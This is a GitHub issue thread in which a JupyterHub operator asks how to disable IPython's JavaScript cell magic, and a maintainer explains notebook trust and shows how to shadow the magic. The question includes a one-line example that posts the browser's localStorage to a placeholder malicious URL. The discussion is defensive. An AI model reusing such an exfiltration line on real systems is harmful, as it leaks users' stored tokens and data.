### ISSUE TITLE
Disable magic commands (javascript)

### ISSUE THREAD

**Issue by RedTn** [ipython/ipython#12472]
We're running jupyterhub and allowing users to share notebooks, but we want to restrict their usage of arbitrary javascript commands for security reasons
```
%%js 
post('myMaliciousUrl', localStorage);
```

Is there a way to disable magic commands? Ideally just for javascript

**Comment by Carreau** [comment]
You understand that if you do this it will be purely cosmetic, and that the ability of %%javascript can be replicated in pure python, or even just having the ability to open and write to file?

Do you also understand that %%javascript does display JavaScript, but that this JavaScript is only executed if the notebook is "trusted", and that otherwise does nothing ?

Do you also understand that a trusted notebook file may run embeded JS at _load_ time, even of all cells are empty ?

**Comment by RedTn** [comment]
@Carreau makes sense, for now is there a way to disable it anwyays? Let's say from a cosmetic point of view rather than secruity

**Comment by Carreau** [comment]
Yes, you can define custom magics and shadow the existing ones:
https://ipython.readthedocs.io/en/stable/config/custommagics.html#defining-custom-magics

```
Python 3.8.3 | packaged by conda-forge | (default, Jun  1 2020, 17:21:09)
Type 'copyright', 'credits' or 'license' for more information
IPython 7.17.0 -- An enhanced Interactive Python. Type '?' for help.

In [1]: from IPython.core.magic import (register_line_magic, register_cell_magic,
   ...:                                 register_line_cell_magic)
   ...:
   ...: @register_line_cell_magic
   ...: def javascript(line, cell=None):
   ...:     return 'No'


In [2]: %%javascript
   ...: stuff

Out[2]: 'No'
```

You can put that in a global config file and overwrite any user magic.
